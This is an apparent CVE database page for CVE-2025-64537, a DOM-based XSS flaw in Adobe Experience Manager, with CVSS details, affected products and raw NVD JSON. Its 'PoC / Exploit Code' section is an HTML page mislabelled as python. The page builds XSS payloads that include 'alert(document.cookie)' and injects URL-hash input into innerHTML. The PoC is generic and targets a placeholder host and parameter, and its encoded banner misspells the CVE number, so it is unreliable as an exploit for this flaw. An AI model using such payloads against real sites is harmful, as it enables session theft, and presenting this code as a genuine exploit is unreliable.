Security Vulnerability Report
中文
CVE-2025-64537 CVSS 9.3 CRITICAL

CVE-2025-64537

Published: 2025-12-10 19:16:15
Last Modified: 2025-12-12 19:58:19
Source: [email protected]

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x所有版本
Adobe Experience Manager 6.5.0 至 6.5.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64537 PoC - DOM-based XSS in Adobe Experience Manager --> <!-- This PoC demonstrates how an attacker could exploit the DOM XSS vulnerability --> <!DOCTYPE html> <html> <head> <title>CVE-2025-64537 PoC</title> </head> <body> <h1>DOM-based XSS PoC for CVE-2025-64537</h1> <p>Adobe Experience Manager versions <= 6.5.23</p> <!-- Malicious URL that triggers the XSS --> <a href="javascript:void(0)" onclick="generateXSSPayload()">Click to generate malicious URL</a> <script> // Function to generate the malicious URL function generateXSSPayload() { // The vulnerable parameter that gets reflected in DOM without sanitization const vulnerableParam = '?param=<img src=x onerror="alert(String.fromCharCode(67,86,69,45,50,48,50,53,45,54,52,53,51,37,32,80,111,67,32,69,120,112,108,111,105,116,101,100))">'; // Simulated vulnerable endpoint const baseUrl = 'https://vulnerable-aem-instance.com/content'; const maliciousUrl = baseUrl + vulnerableParam; // Display the payload alert('Malicious URL:\n' + maliciousUrl); console.log('PoC URL:', maliciousUrl); // Copy to clipboard demonstration prompt('Copy this URL to exploit:', maliciousUrl); } // Simulated vulnerable code pattern found in Adobe Experience Manager function simulateVulnerableCode() { // This simulates how the vulnerability works // Vulnerable: Direct DOM manipulation with user input // var userInput = location.hash.substring(1); // document.getElementById('output').innerHTML = userInput; // Safe: Using textContent instead of innerHTML // document.getElementById('output').textContent = userInput; console.log('Vulnerable pattern: innerHTML = userInput'); console.log('Safe pattern: textContent = userInput'); } // Execute demonstration simulateVulnerableCode(); </script> <!-- Simulated vulnerable page content --> <div id="vulnerable-output"></div> <script> // Simulating the vulnerable code behavior // In real exploitation, this would read from URL params or location hash const simulatedInput = location.hash.substring(1) || '<img src=x onerror="alert(document.cookie)">'; // VULNERABLE: This would execute the XSS payload // document.getElementById('vulnerable-output').innerHTML = simulatedInput; // For demonstration, we show what would happen document.getElementById('vulnerable-output').innerHTML = '<em>Simulated vulnerable output (XSS would execute here):</em> ' + simulatedInput; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64537", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:14.980", "lastModified": "2025-12-12T19:58:19.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.